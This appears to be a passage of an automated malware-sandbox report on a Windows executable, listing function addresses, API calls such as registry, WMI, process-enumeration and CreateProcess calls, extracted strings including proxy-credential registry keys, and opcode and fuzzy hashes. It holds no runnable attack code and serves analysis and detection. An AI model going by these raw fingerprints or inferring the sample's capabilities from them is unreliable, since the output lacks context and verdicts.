                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen_strncmp
                                                                                                                                                • String ID: ../$/..$/../$/./
                                                                                                                                                • API String ID: 2202561641-456519384
                                                                                                                                                • Opcode ID: 57a11275e05107d5c2e3bc45e89924c921d0fdb577c2a7f0e44e842921c8f5d5
                                                                                                                                                • Instruction ID: 2a9eb74c0010382e6a9c0f94d66219e75d5063870ed275114ebd33133e286e1b
                                                                                                                                                • Opcode Fuzzy Hash: 57a11275e05107d5c2e3bc45e89924c921d0fdb577c2a7f0e44e842921c8f5d5
                                                                                                                                                • Instruction Fuzzy Hash: EA412879508342EEFB6157665C06F7B6F98DF22350F24002FED8551283EA7E8941929E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0040E0C0
                                                                                                                                                • _memset.LIBCMT ref: 0040E0E7
                                                                                                                                                • _memset.LIBCMT ref: 0040E0FC
                                                                                                                                                  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
                                                                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,00000000,0050EB7C), ref: 0040E148
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0050EB7C), ref: 0040E1DA
                                                                                                                                                  • Part of subcall function 0040F6CC: RegQueryValueExW.ADVAPI32(00000050,0040DF01,00000000,?,?,?,?,?,0040DF01,00000050), ref: 0040F6EC
                                                                                                                                                  • Part of subcall function 0040F665: RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?,?,?,00412081,?,?,00000000,?,?,004FC0BC,00000000), ref: 0040F686
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: QueryValue_memset$CloseH_prologOpen__vsnprintf
                                                                                                                                                • String ID: Proxy Authorization$Proxy Password$Proxy User$Software\Kingsoft\KVip\%d$|P
                                                                                                                                                • API String ID: 4194701713-1788933088
                                                                                                                                                • Opcode ID: aa894a14442030cd0f7e5afada8520e77f4a5378fd3468e3713c755626575fe3
                                                                                                                                                • Instruction ID: 83742770093a2a4c7377dc355f655d677f570305fdad84f77b4d6d6abf606318
                                                                                                                                                • Opcode Fuzzy Hash: aa894a14442030cd0f7e5afada8520e77f4a5378fd3468e3713c755626575fe3
                                                                                                                                                • Instruction Fuzzy Hash: CF315DB2D0011EABDB10EF95CD81AEEB7B8EF08304F10447AF615F2281D7745A588BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _strlen
                                                                                                                                                • String ID: %s://%s$Found connection %ld, with requests in the pipe (%zu)$No connections available.$Re-using existing connection! (#%ld) with %s %s$We can reuse, but we want a new connection anyway$host$memory shortage$proxy
                                                                                                                                                • API String ID: 4218353326-2522828998
                                                                                                                                                • Opcode ID: e636650e67e96ad428f134a941a6ebc51505305611326be4d5b70f7987deeeaa
                                                                                                                                                • Instruction ID: 0629f43861695122e28beef394b88588eb26e683bcd081b77cbc39b1ee6ffb03
                                                                                                                                                • Opcode Fuzzy Hash: e636650e67e96ad428f134a941a6ebc51505305611326be4d5b70f7987deeeaa
                                                                                                                                                • Instruction Fuzzy Hash: 9F126E71A00215AFDB15DF64C8947EEBBB4FF08315F54416BE909EB261DB389940CBA8
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,0041C8BA,00000002,?,?), ref: 0041464C
                                                                                                                                                • CoCreateInstance.OLE32(004F86A4,00000000,00000001,004F85D4,?,?,?,?,?,?,0041C8BA,00000002,?,?), ref: 00414674
                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,0041C8BA,00000002,?,?), ref: 0041467E
                                                                                                                                                  • Part of subcall function 00414027: __EH_prolog.LIBCMT ref: 0041402C
                                                                                                                                                  • Part of subcall function 00414027: SysAllocString.OLEAUT32(ROOT\CIMV2), ref: 0041405E
                                                                                                                                                • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,0041C8BA,00000002,?), ref: 004146DE
                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,0041C8BA,00000002,?,?), ref: 004146FF
                                                                                                                                                  • Part of subcall function 00413FC8: __EH_prolog.LIBCMT ref: 00413FCD
                                                                                                                                                  • Part of subcall function 00413FC8: _com_util::ConvertStringToBSTR.COMSUPP ref: 00413FF7
                                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004147C7
                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00414803
                                                                                                                                                • CoUninitialize.OLE32(?,?,?,?,?,0041C8BA,00000002,?,?), ref: 00414856
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp Download File
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Uninitialize$H_prologStringVariant$AllocBlanketClearConvertCreateInitInitializeInstanceProxy_com_util::
                                                                                                                                                • String ID: WQL
                                                                                                                                                • API String ID: 2099336664-1249411209
                                                                                                                                                • Opcode ID: 10be1641b96ce8c0171fd3283910cbdeec3b6d6621caaf846b2129a288b20475
                                                                                                                                                • Instruction ID: 4ebbe4a287fabd5bab023775912cd2af243c91ef235375fd03f28bbfd6f213c3
                                                                                                                                                • Opcode Fuzzy Hash: 10be1641b96ce8c0171fd3283910cbdeec3b6d6621caaf846b2129a288b20475
                                                                                                                                                • Instruction Fuzzy Hash: D8716D74204310AFC710DF55C848DABBBA9FFC9728F10491EF5599B290C738D986CB9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • __EH_prolog.LIBCMT ref: 0041C172
                                                                                                                                                  • Part of subcall function 00405CD7: __EH_prolog.LIBCMT ref: 00405CDC
                                                                                                                                                • PathFileExistsW.SHLWAPI(?,?,?,?,00000000,?,00000000), ref: 0041C204
                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0041C20C
                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0041C236
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C24E
                                                                                                                                                  • Part of subcall function 0048E466: __lock.LIBCMT ref: 0048E484
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_find_block.LIBCMT ref: 0048E48F
                                                                                                                                                  • Part of subcall function 0048E466: ___sbh_free_block.LIBCMT ref: 0048E49E
                                                                                                                                                  • Part of subcall function 0048E466: HeapFree.KERNEL32(00000000,00000001,004FFCB0,0000000C,00499E1C,00000000,00500298,0000000C,00499E54,00000001,?,?,0048F0A4,00000004,004FFD30,0000000C), ref: 0048E4CE
  • Part of subcall function 0048E466: GetLastError.KERNEL32(?,0048F0A4,00000004,004FFD30,0000000C,00499516,00000000,00000000,00000000,00000000,00000000,0049AF7A,00000001,00000214), ref: 0048E4DF
• PathFileExistsW.SHLWAPI(?), ref: 0041C279
• CloseHandle.KERNEL32(00000000), ref: 0041C287
• CloseHandle.KERNEL32(00000000), ref: 0041C29F
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: File$CloseHandle$DeleteExistsH_prologPath$ErrorFreeHeapLast___sbh_find_block___sbh_free_block__lock
• String ID: |P
• API String ID: 997926422-2149487505
• Opcode ID: e0a14216cb96035f6565a93be4b6b75aa4e33e8b930b331e8e61284d517a2148
• Instruction ID: c5bc3d0ca81e0a753c4878c3fe0d74e14927dbdef6833646577855f0f8973990
• Opcode Fuzzy Hash: e0a14216cb96035f6565a93be4b6b75aa4e33e8b930b331e8e61284d517a2148
• Instruction Fuzzy Hash: FE416A35D40209DFDF119FA8CC85BEEBBB0AF04359F10406AE505B62A1CB799E90CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(KERNEL32.DLL,005002D8,0000000C,0049AFA3,00000000,00000000), ref: 0049AEA3
• GetProcAddress.KERNEL32(?,EncodePointer), ref: 0049AED7
• GetProcAddress.KERNEL32(?,DecodePointer), ref: 0049AEE7
• InterlockedIncrement.KERNEL32(0050A468), ref: 0049AF09
• __lock.LIBCMT ref: 0049AF11
• ___addlocaleref.LIBCMT ref: 0049AF30
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
• String ID: DecodePointer$EncodePointer$KERNEL32.DLL
• API String ID: 1036688887-2843748187
• Opcode ID: e1c474768d647904cc92c4c88903e14c53f708d1c675720d0d951d5a9a72d946
• Instruction ID: 9abd897ee4b4358aabb361808043586954bda9d09565c128b7dddba31933434b
• Opcode Fuzzy Hash: e1c474768d647904cc92c4c88903e14c53f708d1c675720d0d951d5a9a72d946
• Instruction Fuzzy Hash: 20118FB09407029FDF10DF7AD805B6ABFE0BF40304F10852EE896A6391DB799901CB6A
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
• Opcode ID: 16e16bc54c40865efb96423d64dff138d074752b2b99fcfd6b80511a95cecb1c
• Instruction ID: 74831f452f762990932c41c5cd873db7958ed63fdb7ddce1eacb14cb3da78b68
• Opcode Fuzzy Hash: 16e16bc54c40865efb96423d64dff138d074752b2b99fcfd6b80511a95cecb1c
• Instruction Fuzzy Hash: C581D471B006049BDF24EF6ECC829AFBBF9AF96314B14457FF411D2292E7789A008759
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 00456660
• GetTickCount.KERNEL32 ref: 0045668A
• GetTickCount.KERNEL32 ref: 004566E8
• GetTickCount.KERNEL32 ref: 0045670A
• GetTickCount.KERNEL32 ref: 0045676C
• GetTickCount.KERNEL32 ref: 00456787
• GetTickCount.KERNEL32 ref: 004567D4
• CloseHandle.KERNEL32(?,?,?,00000001,?,0043F744), ref: 004567F0
• FreeLibrary.KERNEL32(00000000,?,?,00000001,?,0043F744), ref: 004567F7
• GlobalMemoryStatus.KERNEL32 ref: 00456809
• GetCurrentProcessId.KERNEL32(?,?,?,00000001,?,0043F744), ref: 0045682F
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: CountTick$CloseCurrentFreeGlobalHandleLibraryMemoryProcessStatus
• String ID:
• API String ID: 2654232908-0
• Opcode ID: fbe8ca40ba3db215de534d00d286d4bfd4e329d6db6f3fb8ca8b31f556348e1e
• Instruction ID: 88774315d0e8f86b32cc6d45917213842936886f929a18a5dd9ff9c65f816292
• Opcode Fuzzy Hash: fbe8ca40ba3db215de534d00d286d4bfd4e329d6db6f3fb8ca8b31f556348e1e
• Instruction Fuzzy Hash: E061A675900209DBDF10EFA4DD88BEE7BB4FF08305F45456AE905A3282DB389948CF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00404C46
• _memcmp.LIBCMT ref: 00404CC3
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,-00000004), ref: 00404E34
• __wcsicmp.LIBCMT ref: 00404E57
• __wcsicmp.LIBCMT ref: 00404E76
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: __wcsicmp$DeleteFileH_prolog_memcmp
• String ID: dll$exe$|P
• API String ID: 1235803337-2597355190
• Opcode ID: e8a4852f3a2965780106b376abf97b48ef67a45f8b887c2d15c48327a73491c6
• Instruction ID: 6e2091d73e2fffe49f2534cbc516377e711007a4e7da3c2578e825623c8549d9
• Opcode Fuzzy Hash: e8a4852f3a2965780106b376abf97b48ef67a45f8b887c2d15c48327a73491c6
• Instruction Fuzzy Hash: 08616A72D001199BDF21AB65DC417EEB775FF40318F1040BAEA0977292DA396E85CF98
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _memset$_malloc_printf_strrchr
• String ID: +)A$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=$No enough memory.
• API String ID: 1711662499-3740422276
• Opcode ID: 6c8ea553888cbe60846ec1f6a89ce44cb19381504df270cf33ade7b3f699555c
• Instruction ID: b01aeb84f23958e49c34db4a699e986b72cd8556e53697caac0c2875339ac7ef
• Opcode Fuzzy Hash: 6c8ea553888cbe60846ec1f6a89ce44cb19381504df270cf33ade7b3f699555c
• Instruction Fuzzy Hash: F04125B1E002199FDB14DEA8C9456FEBBB8EF00355F14406FE901E7281C7B89E91C798
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0041AC55
• _memset.LIBCMT ref: 0041AC6B
  • Part of subcall function 0040D892: __vsnprintf.LIBCMT ref: 0040D8C9
• CreateProcessW.KERNEL32 ref: 0041ACCD
• CloseHandle.KERNEL32(?), ref: 0041ACE7
• CloseHandle.KERNEL32(?), ref: 0041ACF4
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
                                                                                                                                                • API ID: CloseHandle$CreateH_prologProcess__vsnprintf_memset
                                                                                                                                                • String ID: "%s" %s$D$|P
                                                                                                                                                • API String ID: 2645196505-3168561481
                                                                                                                                                • Opcode ID: 7a336fea46065751543b401d3eb48c558815c9e587084405d7daaf6b32f68047
                                                                                                                                                • Instruction ID: 227bcee839633bdccf328dd2f2704832d306fd05aaf5459cd94fe1b33afdac53
                                                                                                                                                • Opcode Fuzzy Hash: 7a336fea46065751543b401d3eb48c558815c9e587084405d7daaf6b32f68047
                                                                                                                                                • Instruction Fuzzy Hash: 09214972D00218ABCB11DFA9DD41AEEBBB9FF48314F10402AE505B6251D7399E14DBA9
                                                                                                                                                Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strcpy_s_strlen
• String ID: 65535$udp
• API String ID: 3603354130-1267037602
• Opcode ID: 789fa19b01885c4af587ae6ecda65b783609ad18778648db5a4db7e6d7096403
• Instruction ID: 4c57fe7f1e18b69ce279228fb34a654e40b0c99fb66e3e12e5c9deb0a4398986
• Opcode Fuzzy Hash: 789fa19b01885c4af587ae6ecda65b783609ad18778648db5a4db7e6d7096403
• Instruction Fuzzy Hash: DF51C131A0521A9BDF24DF698805AFF37B4FB45300F1A843BE801E6281D73CA9019B7A
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• Read callback asked for PAUSE when not supported!, xrefs: 004BEE2F
• read function returned funny value, xrefs: 004BEE69
• operation aborted by callback, xrefs: 004BEE00
• %x%s, xrefs: 004BEE9A
Memory Dump Source
• Source File: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: _strlen$__fprintf_l
• String ID: %x%s$Read callback asked for PAUSE when not supported!$operation aborted by callback$read function returned funny value
• API String ID: 3363873489-1291304620
• Opcode ID: 0c14bb68cda72c121dd238d4f42e3c468b134e32b59a2be5673f48ec76506c6b
• Instruction ID: f97c96560d3cecf0482a383f2ab3123e6201ccee3bce326b73556931e6f4161b
• Opcode Fuzzy Hash: 0c14bb68cda72c121dd238d4f42e3c468b134e32b59a2be5673f48ec76506c6b
• Instruction Fuzzy Hash: 01417131A0070AAFDB24DF75C846BFFB7E4EB45314F10082BE115E6291D779A941CBAA
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004036C6: CharNextW.USER32(?,00402A0A,?,00000000,?,?,?,00402613,>%@,00000000,00000000,?,?,0040253E,?), ref: 004036E0
• CharNextW.USER32(00000000,00000000,?,00000000,?,?,?,00402613,>%@,00000000,00000000,?,?,0040253E,?), ref: 00402A2F
• CharNextW.USER32(?,?,00000000,?,?,?,00402613,>%@,00000000,00000000,?,?,0040253E,?), ref: 00402AA1
Strings
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: CharNext
• String ID: >%@
• API String ID: 3213498283-1335591167
• Opcode ID: a3d116ac5adabef441316b3be795912d12ea8691a95733785c63b3d49299a1d6
• Instruction ID: b6eb42ca2683454257c8e1a55ebec0d5e3a90e68dfc023e433ffb598e63648c9
• Opcode Fuzzy Hash: a3d116ac5adabef441316b3be795912d12ea8691a95733785c63b3d49299a1d6
• Instruction Fuzzy Hash: 48319570610205DADB359F68CA8862673F5EF55345B20497AD482E73E0EBF89C81DB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,?,00000000), ref: 0041E110
• OpenProcess.KERNEL32(00000410,00000000,?,?,00000000), ref: 0041E163
• _memset.LIBCMT ref: 0041E187
• GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000103,?,?,00000000), ref: 0041E19D
• _memset.LIBCMT ref: 0041E1B6
• GetProcessImageFileNameW.PSAPI(00000000,?,00000104,00000000,?,00000103,?,?,00000000), ref: 0041E1CB
• CloseHandle.KERNEL32(?,?,00000000), ref: 0041E216
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: Process$FileNameOpen_memset$CloseHandleImageModule
• String ID:
• API String ID: 3232383893-0
• Opcode ID: cf3912897c502f488d78aecd238ab0166fdab61408618d831e02ba115a03c713
• Instruction ID: 657f5ccb1dfabb98e09bf9e305fc2cee047b27dc6773b891247375200f2a9edd
• Opcode Fuzzy Hash: cf3912897c502f488d78aecd238ab0166fdab61408618d831e02ba115a03c713
• Instruction Fuzzy Hash: 1941A375901119ABDB21EF96CC84EEFBBBCEF09740F0044A7F914E2241D7749A84CBA9
Uniqueness

Uniqueness Score: -1.00%

APIs
• _memset.LIBCMT ref: 0041CCDD
• LoadLibraryW.KERNEL32(00720065,?,00000000,00000001), ref: 0041CCF7
• GetLastError.KERNEL32(?,00000000,00000001), ref: 0041CD0B
• _memset.LIBCMT ref: 0041CD2F
• WideCharToMultiByte.KERNEL32(00000000,00000000,0069006E,?,?,000000FF,00000000,00000000,?,?,?,?,00000000,00000001), ref: 0041CD4B
• GetProcAddress.KERNEL32(00000000,?), ref: 0041CD5F
• GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 0041CD70
• FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 0041CD80
Memory Dump Source
• Source File: 00000001.00000002.259729794.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.259724443.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260568666.0000000000495000.00000040.00020000.sdmp
• Associated: 00000001.00000002.260581341.0000000000497000.00000080.00020000.sdmp
• Associated: 00000001.00000002.260636239.00000000004C6000.00000002.00020000.sdmp
• Associated: 00000001.00000002.260798990.0000000000505000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260823408.000000000050A000.00000004.00020000.sdmp
• Associated: 00000001.00000002.260843067.000000000050B000.00000008.00020000.sdmp
• Associated: 00000001.00000002.260852767.0000000000512000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLastLibrary_memset$AddressByteCharFreeLoadMultiProcWide
• String ID:
• API String ID: 4119534970-0
